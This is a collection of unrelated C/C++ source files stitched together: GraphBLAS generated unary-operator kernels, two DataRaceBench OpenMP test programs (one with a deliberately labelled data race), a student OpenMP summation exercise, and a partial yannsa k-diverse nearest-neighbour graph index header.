#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = y ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GxB_FC64_t y = (*((const GxB_FC64_t *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
#endif
|
DRB096-doall2-taskloop-collapse-orig-no.c | /*
Copyright (C) 1991-2018 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it andor
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http:www.gnu.org/licenses/>.
*/
/*
This header is separate from features.h so that the compiler can
include it implicitly at the start of every compilation. It must
not itself include <features.h> or any other header that includes
<features.h> because the implicit include comes before any feature
test macros that may be defined in a source file before it first
explicitly includes a system header. GCC knows the name of this
header in order to preinclude it.
*/
/*
glibc's intent is to support the IEC 559 math functionality, real
and complex. If the GCC (4.9 and later) predefined macros
specifying compiler intent are available, use them to determine
whether the overall intent is to support these features; otherwise,
presume an older compiler has intent to support these features and
define these macros by default.
*/
/*
wchar_t uses Unicode 10.0.0. Version 10.0 of the Unicode Standard is
synchronized with ISOIEC 10646:2017, fifth edition, plus
the following additions from Amendment 1 to the fifth edition:
- 56 emoji characters
- 285 hentaigana
- 3 additional Zanabazar Square characters
*/
/*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https:github.comLLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
Two-dimensional array computation:
Two loops are associated with omp taskloop due to collapse(2).
Both loop index variables are private.
taskloop requires OpenMP 4.5 compilers.
*/
#include <stdio.h>
int a[100][100];
int main()
{
int i, j;
int _ret_val_0;
#pragma cetus private(i, j)
#pragma loop name main#0
#pragma cetus parallel
#pragma omp parallel for private(i, j)
for (i=0; i<100; i ++ )
{
#pragma cetus private(j)
#pragma loop name main#0#0
#pragma cetus parallel
#pragma omp parallel for private(j)
for (j=0; j<100; j ++ )
{
a[i][j]+=1;
}
}
printf("a[50][50]=%d\n", a[50][50]);
_ret_val_0=0;
return _ret_val_0;
}
|
GB_unop__log1p_fc32_fc32.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_atomics.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop_apply__log1p_fc32_fc32
// op(A') function: GB_unop_tran__log1p_fc32_fc32
// C type: GxB_FC32_t
// A type: GxB_FC32_t
// cast: GxB_FC32_t cij = aij
// unaryop: cij = GB_clog1pf (aij)
#define GB_ATYPE \
GxB_FC32_t
#define GB_CTYPE \
GxB_FC32_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
GxB_FC32_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = GB_clog1pf (x) ;
// casting
#define GB_CAST(z, aij) \
GxB_FC32_t z = aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GxB_FC32_t aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
GxB_FC32_t z = aij ; \
Cx [pC] = GB_clog1pf (z) ; \
}
// true if operator is the identity op with no typecasting
#define GB_OP_IS_IDENTITY_WITH_NO_TYPECAST \
0
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_LOG1P || GxB_NO_FC32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_apply__log1p_fc32_fc32
(
GxB_FC32_t *Cx, // Cx and Ax may be aliased
const GxB_FC32_t *Ax,
const int8_t *GB_RESTRICT Ab, // A->b if A is bitmap
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
if (Ab == NULL)
{
#if ( GB_OP_IS_IDENTITY_WITH_NO_TYPECAST )
GB_memcpy (Cx, Ax, anz * sizeof (GxB_FC32_t), nthreads) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
GxB_FC32_t aij = Ax [p] ;
GxB_FC32_t z = aij ;
Cx [p] = GB_clog1pf (z) ;
}
#endif
}
else
{
// bitmap case, no transpose; A->b already memcpy'd into C->b
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!Ab [p]) continue ;
GxB_FC32_t aij = Ax [p] ;
GxB_FC32_t z = aij ;
Cx [p] = GB_clog1pf (z) ;
}
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_tran__log1p_fc32_fc32
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Workspaces,
const int64_t *GB_RESTRICT A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
DRB005-indirectaccess1-orig-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
This program is extracted from a real application at LLNL.
Two pointers (xa1 and xa2) have a pair of values with a distance of 12.
They are used as start base addresses for two 1-D arrays.
Their index set has two indices with distance of 12: 999 +12 = 1011.
So there is loop carried dependence.
However, having loop carried dependence does not mean data races will always happen.
The iterations with loop carried dependence must be scheduled to
different threads in order for data races to happen.
In this example, we use schedule(static,1) to increase the chance that
the dependent loop iterations will be scheduled to different threads.
Data race pair: xa1[idx]@128:5 vs. xa2[idx]@129:5
*/
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#define N 180
int indexSet[N] = {
521, 523, 525, 527, 529, 531,
547, 549, 551, 553, 555, 557,
573, 575, 577, 579, 581, 583,
599, 601, 603, 605, 607, 609,
625, 627, 629, 631, 633, 635,
651, 653, 655, 657, 659, 661,
859, 861, 863, 865, 867, 869,
885, 887, 889, 891, 893, 895,
911, 913, 915, 917, 919, 923, // change original 921 to 923 = 911+12
937, 939, 941, 943, 945, 947,
963, 965, 967, 969, 971, 973,
989, 991, 993, 995, 997, 999,
1197, 1199, 1201, 1203, 1205, 1207,
1223, 1225, 1227, 1229, 1231, 1233,
1249, 1251, 1253, 1255, 1257, 1259,
1275, 1277, 1279, 1281, 1283, 1285,
1301, 1303, 1305, 1307, 1309, 1311,
1327, 1329, 1331, 1333, 1335, 1337,
1535, 1537, 1539, 1541, 1543, 1545,
1561, 1563, 1565, 1567, 1569, 1571,
1587, 1589, 1591, 1593, 1595, 1597,
1613, 1615, 1617, 1619, 1621, 1623,
1639, 1641, 1643, 1645, 1647, 1649,
1665, 1667, 1669, 1671, 1673, 1675,
1873, 1875, 1877, 1879, 1881, 1883,
1899, 1901, 1903, 1905, 1907, 1909,
1925, 1927, 1929, 1931, 1933, 1935,
1951, 1953, 1955, 1957, 1959, 1961,
1977, 1979, 1981, 1983, 1985, 1987,
2003, 2005, 2007, 2009, 2011, 2013};
int main (int argc, char* argv[])
{
// max index value is 2013. +1 to ensure a reference like base[2015]
// Pointers will never access the same offset as (xa2 = base + 2014).
double * base = (double*) malloc(sizeof(double)* (2013+1+2013+1));
if (base == 0)
{
printf ("Error in malloc(). Aborting ...\n");
return 1;
}
double * xa1 = base;
double * xa2 = xa1 + 2014;
int i;
// initialize segments touched by indexSet
#pragma omp parallel for private(i )
for (i =521; i<= 2025; ++i)
{
base[i]=0.5*i;
}
// default static even scheduling may not trigger data race, using static,1 instead.
#pragma omp parallel for private(i )
for (i =0; i< N; ++i)
{
int idx = indexSet[i];
xa1[idx]+= 1.0 + i;
xa2[idx]+= 3.0 + i;
}
printf("x1[999]=%f xa2[1285]=%f\n", xa1[999], xa2[1285]);
free (base);
return 0;
}
|
cleaned_t_b_all.c | /**
F.H.P.C. Assingment 2
@file cleaned_t_b_all_option_2.cc
@brief All threads fill the array and perform the sum.
@author Pietro Morichetti
@date 17/12/2019
@version 1.1
*/
#include <stdlib.h>
#include <stdio.h>
#include <omp.h>
#define _GNU_SOURCE
#define N 10000000 // size of the problem
int main(int argc, char **argv){
long int S = 0;
int* array = (int*)malloc(N * sizeof(int));
#if defined(_OPENMP)
if(argc > 1){
omp_set_num_threads(atoi(*(argv + 1))); // set the number of threads
}
#endif
#pragma omp parallel for // everybody fills the array
for(int ii = 0; ii < N; ++ii){
array[ii] = ii;
}
#pragma omp parallel for reduction(+:S) // everyone add up and reduce on S
for(int ii = 0; ii < N; ++ii){
S += array[ii];
}
free(array);
return 0;
}
|
graph_index.h | #ifndef YANNSA_GRAPH_INDEX_H
#define YANNSA_GRAPH_INDEX_H
#include "yannsa/base/type_definition.h"
#include "yannsa/base/error_definition.h"
#include "yannsa/base/constant_definition.h"
#include "yannsa/util/sorted_array.h"
#include "yannsa/util/parameter.h"
#include "yannsa/util/logging.h"
#include "yannsa/util/lock.h"
#include "yannsa/util/random_generator.h"
#include "yannsa/core/base_index.h"
#include <omp.h>
#include <vector>
#include <string>
#include <memory>
#include <algorithm>
#include <fstream>
#include <sstream>
#include <cstdlib>
namespace yannsa {
namespace core {
template <typename PointType, typename DistanceFuncType, typename DistanceType = float>
class GraphIndex : public BaseIndex<PointType, DistanceFuncType, DistanceType> {
public:
typedef BaseIndex<PointType, DistanceFuncType, DistanceType> BaseClass;
typedef typename BaseClass::Dataset Dataset;
typedef typename BaseClass::DatasetPtr DatasetPtr;
typedef typename BaseClass::PointVector PointVector;
private:
// point
typedef PointDistancePair<IntIndex, DistanceType> PointDistancePairItem;
typedef util::SortedArray<PointDistancePairItem> PointNeighbor;
private:
struct PointInfo {
// graph
PointNeighbor knn;
// for local join
IdList old_list;
IdList new_list;
IdList reverse_old_list;
IdList reverse_new_list;
DistanceType radius;
size_t effect_size;
util::Mutex lock;
PointInfo(int k) {
knn = PointNeighbor(k);
}
void reset(size_t s) {
old_list.clear();
new_list.clear();
reverse_new_list.clear();
reverse_old_list.clear();
effect_size = s;
if (effect_size > 0) {
radius = knn[effect_size-1].distance;
}
else {
radius = 0;
}
}
void insert(IntIndex point_id, bool new_flag) {
if (new_flag) {
new_list.push_back(point_id);
}
else {
old_list.push_back(point_id);
}
}
void parallel_insert_reverse(IntIndex point_id, bool new_flag) {
util::ScopedLock sl(lock);
if (new_flag) {
reverse_new_list.push_back(point_id);
}
else {
reverse_old_list.push_back(point_id);
}
}
};
public:
GraphIndex(typename BaseClass::DatasetPtr& dataset_ptr) : BaseClass(dataset_ptr) {}
void Build(const util::GraphIndexParameter& index_param);
void AddNewPoint(const std::string& key, const PointType& point_vec, int search_K);
void SearchKnn(const PointType& query, const util::GraphSearchParameter& search_param,
std::vector<std::string>& search_result);
void SaveIndex(const std::string file_path);
void LoadIndex(const std::string file_path);
private:
void SearchKnn(const PointType& query, int search_K, PointNeighbor& knn_results);
void MMRRanking(const PointType& vertex_vec, PointNeighbor& knn, size_t knn_candidate_size, double lambda);
void Init(const util::GraphIndexParameter& index_param);
void Clear();
void BuildKnnGraphIndex(int refine_iter_num);
void ExtractIndex();
void Prune();
void Reverse();
inline const PointType& GetPoint(IntIndex point_id) {
return (*this->dataset_ptr_)[point_id];
}
inline IntIndex PointSize() {
return this->dataset_ptr_->size();
}
int UpdatePointKnn(IntIndex point1, IntIndex point2);
void InitPointNeighborInfo();
void UpdatePointNeighborInfo();
int LocalJoin();
private:
// index
int k_;
int join_k_;
double lambda_;
std::vector<PointInfo> all_point_info_;
// search
IdList shuffle_point_id_list_;
std::vector<IdList> all_point_index_;
DistanceFuncType distance_func_;
};
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Clear() {
this->have_built_ = false;
// point
all_point_info_.clear();
all_point_index_.clear();
shuffle_point_id_list_.clear();
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Init(
const util::GraphIndexParameter& index_param) {
k_ = index_param.k;
join_k_ = std::max(index_param.join_k, k_);
lambda_ = index_param.lambda;
IntIndex max_point_id = this->dataset_ptr_->size();
all_point_index_.reserve(max_point_id);
all_point_info_ = std::vector<PointInfo>(max_point_id, PointInfo(join_k_));
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::LoadIndex(
const std::string file_path) {
util::Log("load the index from " + file_path);
Clear();
IntIndex total_cnt = 0;
IntIndex max_cnt = 0;
std::ifstream load_file(file_path, std::ios::binary);
// magic number
int magic_number = 0;
load_file.read(reinterpret_cast<char*>(&magic_number), sizeof(int));
if (magic_number != constant::magic_number) {
throw IndexReadError("index is corrupted!");
}
// meta information
// all point number
IntIndex point_number = 0;
load_file.read(reinterpret_cast<char*>(&point_number), sizeof(IntIndex));
// parameters for updating
load_file.read(reinterpret_cast<char*>(&k_), sizeof(int));
load_file.read(reinterpret_cast<char*>(&join_k_), sizeof(int));
load_file.read(reinterpret_cast<char*>(&lambda_), sizeof(double));
all_point_index_.reserve(point_number);
all_point_index_.resize(point_number);
IntIndex neighbor_num = 0;
for (IntIndex point_id = 0; point_id < point_number; point_id++) {
load_file.read(reinterpret_cast<char*>(&neighbor_num), sizeof(IntIndex));
max_cnt = std::max(max_cnt, neighbor_num);
total_cnt += neighbor_num;
IdList& knn_list = all_point_index_[point_id];
knn_list.resize(neighbor_num);
for (size_t i = 0; i < neighbor_num; i++) {
load_file.read(reinterpret_cast<char*>(&knn_list[i]), sizeof(IntIndex));
}
}
util::Log("Point: " + std::to_string(all_point_index_.size()) +
" Max nn = " + std::to_string(max_cnt) +
" Average nn = " + std::to_string(total_cnt * 1.0 / PointSize()) +
" k = " + std::to_string(k_) + " join_k = " + std::to_string(join_k_));
// shuffle data
for (IntIndex i = 0; i < PointSize(); i++) {
shuffle_point_id_list_.push_back(i);
}
std::random_shuffle(shuffle_point_id_list_.begin(), shuffle_point_id_list_.end());
this->SetIndexBuiltFlag();
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::SaveIndex(
const std::string file_path) {
this->CheckIndexIsBuilt();
util::Log("save the index to " + file_path);
std::ofstream save_file(file_path, std::ios::binary);
// magic number
int magic_number = constant::magic_number;
save_file.write(reinterpret_cast<char*>(&magic_number), sizeof(int));
// meta information
// all point number
IntIndex point_number = PointSize();
save_file.write(reinterpret_cast<char*>(&point_number), sizeof(IntIndex));
// parameters for updating
save_file.write(reinterpret_cast<char*>(&k_), sizeof(int));
save_file.write(reinterpret_cast<char*>(&join_k_), sizeof(int));
save_file.write(reinterpret_cast<char*>(&lambda_), sizeof(double));
// neighbor_num neighbor1 neighbor2
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
const IdList& knn_list = all_point_index_[point_id];
IntIndex neighbor_num = knn_list.size();
save_file.write(reinterpret_cast<char*>(&neighbor_num), sizeof(IntIndex));
for (IntIndex neighbor_id : knn_list) {
save_file.write(reinterpret_cast<char*>(&neighbor_id), sizeof(IntIndex));
}
}
save_file.close();
}
/*
TODO
reserve the container and point index to reduce the memory cost
*/
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::AddNewPoint(
const std::string& key, const PointType& point_vec, int search_K) {
this->CheckIndexIsBuilt();
// find join_k_ neighbors
PointNeighbor new_point_knn(std::max(search_K, join_k_));
SearchKnn(point_vec, search_K, new_point_knn);
// rank neighbors of new point and keep top-k
MMRRanking(point_vec, new_point_knn, join_k_, lambda_);
// insert data point into dataset
// insert must after search
IntIndex new_point_id = this->dataset_ptr_->insert(key, point_vec);
// insert new point's knn list
int new_neighbor_num = std::max(join_k_, k_*2);
IdList new_point_knn_list(new_neighbor_num);
for (size_t i = 0; i < new_neighbor_num; i++) {
new_point_knn_list[i] = new_point_knn[i].id;
all_point_index_[new_point_knn[i].id].push_back(new_point_id);
}
all_point_index_.push_back(new_point_knn_list);
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Build(
const util::GraphIndexParameter& index_param) {
this->CheckIndexIsNotBuilt();
Clear();
Init(index_param);
util::Log("compute initial neighbor candidates");
BuildKnnGraphIndex(index_param.refine_iter_num);
util::Log("re-rank neighbor candidates");
Prune();
util::Log("reverse k-diverse nearest neighbors");
Reverse();
ExtractIndex();
this->SetIndexBuiltFlag();
util::Log("complete the building of k-DNN graph");
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::BuildKnnGraphIndex(
int refine_iter_num) {
InitPointNeighborInfo();
for (size_t loop = 0; loop < refine_iter_num; loop++) {
util::Log("iteration " + std::to_string(loop));
UpdatePointNeighborInfo();
LocalJoin();
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::ExtractIndex() {
all_point_index_.resize(PointSize());
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& neighbor = all_point_info_[point_id].knn;
IdList& knn_list = all_point_index_[point_id];
knn_list.resize(neighbor.size());
for (size_t i = 0; i < neighbor.size(); i++) {
knn_list[i] = neighbor[i].id;
}
}
// clear old knn graph
all_point_info_.clear();
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::MMRRanking(
const PointType& vertex_vec, PointNeighbor& knn,
size_t knn_candidate_size, double lambda) {
knn_candidate_size = std::min(knn_candidate_size, knn.size());
std::vector<double> max_cosine(knn_candidate_size, 0.0);
std::vector<double> proximity(knn_candidate_size, 0.0);
DistanceType max_dist = knn[0].distance;
DistanceType min_dist = knn[0].distance;
for (size_t i = 1; i < knn_candidate_size; i++) {
max_dist = std::max(knn[i].distance, max_dist);
min_dist = std::min(knn[i].distance, min_dist);
}
for (size_t i = 0; i < knn_candidate_size; i++) {
double dist = static_cast<double>(knn[i].distance);
proximity[i] = - dist / (max_dist - min_dist + constant::epsilon);
}
// select i-th neighbors
for (size_t i = 1; i < k_; i++) {
// update diversity score
PointType added_dir = GetPoint(knn[i-1].id) - vertex_vec;
PointType added_dir_norm = added_dir.normalized();
for (size_t j = i; j < knn_candidate_size; j++) {
PointType cur_dir = GetPoint(knn[j].id) - vertex_vec;
PointType cur_dir_norm = cur_dir.normalized();
max_cosine[j] = std::max(max_cosine[j], static_cast<double>(cur_dir_norm.dot(added_dir_norm)));
}
// select max mmr
double max_mmr = 0.0;
int max_mmr_id = -1;
for (size_t j = i; j < knn_candidate_size; j++) {
double mmr = lambda * proximity[j] + (1.0 - lambda) * 0.5 * (-max_cosine[j]);
if (max_mmr_id == -1 || max_mmr < mmr) {
max_mmr_id = j;
max_mmr = mmr;
}
}
std::swap(knn[max_mmr_id], knn[i]);
std::swap(max_cosine[max_mmr_id], max_cosine[i]);
std::swap(proximity[max_mmr_id], proximity[i]);
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Prune() {
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& knn = all_point_info_[point_id].knn;
MMRRanking(GetPoint(point_id), knn, join_k_, lambda_);
knn.remax_size(k_);
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::Reverse() {
// reverse
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& point_neighbor = all_point_info_[point_id].knn;
for (size_t i = 0; i < k_; i++) {
IntIndex neighbor_id = point_neighbor[i].id;
PointNeighbor& neighbor = all_point_info_[neighbor_id].knn;
PointDistancePairItem reverse_neighbor(point_id, point_neighbor[i].distance, true);
neighbor.parallel_push(reverse_neighbor);
}
}
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointNeighbor& point_neighbor = all_point_info_[point_id].knn;
point_neighbor.unique(k_);
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::InitPointNeighborInfo() {
size_t max_point_id = PointSize();
util::IntRandomGenerator int_rand(0, max_point_id-1);
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < max_point_id; point_id++) {
PointInfo& point_info = all_point_info_[point_id];
size_t random_neighbor_size = std::min(static_cast<size_t>(k_), max_point_id-1);
IdSet neighbor_set;
while (neighbor_set.size() < random_neighbor_size) {
IntIndex neighbor_id = int_rand.Random();
if (neighbor_id == point_id || neighbor_set.find(neighbor_id) != neighbor_set.end()) {
continue;
}
neighbor_set.insert(neighbor_id);
DistanceType dist = distance_func_(GetPoint(neighbor_id), GetPoint(point_id));
point_info.knn.insert(PointDistancePairItem(neighbor_id, dist, true));
}
point_info.effect_size = std::min(static_cast<size_t>(k_), point_info.knn.size());
if (point_info.effect_size > 0) {
point_info.radius = point_info.knn[point_info.effect_size-1].distance;
}
else {
point_info.radius = 0;
}
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::UpdatePointNeighborInfo() {
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointInfo& point_info = all_point_info_[point_id];
auto& knn = point_info.knn;
size_t max_effect_size = std::min(knn.size(), static_cast<size_t>(join_k_));
IntIndex effect_size = max_effect_size;
int new_point_count = 0;
for (IntIndex i = 0; i < max_effect_size; i++) {
if (knn[i].flag) {
new_point_count++;
if (new_point_count >= k_) {
effect_size = i+1;
break;
}
}
}
point_info.reset(effect_size);
}
#pragma omp parallel for schedule(static)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointInfo& point_info = all_point_info_[point_id];
auto& knn = point_info.knn;
IntIndex effect_size = knn.effect_size(point_info.effect_size);
for (IntIndex i = 0; i < effect_size; i++) {
auto& neighbor = knn[i];
PointInfo& neighbor_info = all_point_info_[neighbor.id];
// neighbor
point_info.insert(neighbor.id, neighbor.flag);
// reverse neighbor, avoid repeat element
if (neighbor.distance > neighbor_info.radius) {
neighbor_info.parallel_insert_reverse(point_id, neighbor.flag);
}
neighbor.flag = false;
}
}
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
int GraphIndex<PointType, DistanceFuncType, DistanceType>::LocalJoin() {
int sample_num = 100;
int update_count = 0;
#pragma omp parallel for schedule(dynamic, 5) default(shared) reduction(+:update_count)
for (IntIndex point_id = 0; point_id < PointSize(); point_id++) {
PointInfo& point_info = all_point_info_[point_id];
IdList& new_list = point_info.new_list;
IdList& reverse_new_list = point_info.reverse_new_list;
if (new_list.size() == 0 && reverse_new_list.size() == 0) {
continue;
}
if (reverse_new_list.size() > sample_num) {
std::random_shuffle(reverse_new_list.begin(), reverse_new_list.end());
reverse_new_list.resize(sample_num);
}
new_list.insert(new_list.end(), reverse_new_list.begin(), reverse_new_list.end());
IdList& old_list = point_info.old_list;
IdList& reverse_old_list = point_info.reverse_old_list;
if (reverse_old_list.size() > sample_num) {
std::random_shuffle(reverse_old_list.begin(), reverse_old_list.end());
reverse_old_list.resize(sample_num);
}
old_list.insert(old_list.end(), reverse_old_list.begin(), reverse_old_list.end());
// update new
int cur_update_count = 0;
for (size_t i = 0; i < new_list.size(); i++) {
IntIndex p1 = new_list[i];
for (size_t j = i+1; j < new_list.size(); j++) {
IntIndex p2 = new_list[j];
cur_update_count += UpdatePointKnn(p1, p2);
}
for (size_t j = 0; j < old_list.size(); j++) {
IntIndex p2 = old_list[j];
cur_update_count += UpdatePointKnn(p1, p2);
}
}
update_count += cur_update_count;
}
return update_count;
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
int GraphIndex<PointType, DistanceFuncType, DistanceType>::UpdatePointKnn(
IntIndex point1, IntIndex point2) {
if (point1 == point2) {
return 0;
}
DistanceType dist = distance_func_(GetPoint(point1), GetPoint(point2));
int update_count = 0;
int update_pos = all_point_info_[point1].knn.parallel_insert(PointDistancePairItem(point2, dist, true));
update_count += update_pos < k_ ? 1 : 0;
update_pos = all_point_info_[point2].knn.parallel_insert(PointDistancePairItem(point1, dist, true));
update_count += update_pos < k_ ? 1 : 0;
return update_count;
}
template <typename PointType, typename DistanceFuncType, typename DistanceType>
void GraphIndex<PointType, DistanceFuncType, DistanceType>::SearchKnn(
const PointType& query, int search_K, PointNeighbor& knn_results) {
if (!this->have_built_) {
throw IndexBuildError("Graph index hasn't been built!");
}
DynamicBitset visited_point_flag(PointSize(), 0);
util::IntRandomGenerator int_rand(0, PointSize()-1);
size_t random_start = int_rand.Random();
for (size_t random_index = random_start;
random_index < random_start + search_K; random_index++) {
IntIndex start_point_id = shuffle_point_id_list_[random_index % PointSize()];
visited_point_flag[start_point_id] = 1;
DistanceType dist = distance_func_(GetPoint(start_point_id), query);
knn_results.insert(PointDistancePairItem(start_point_id, dist, true));
}
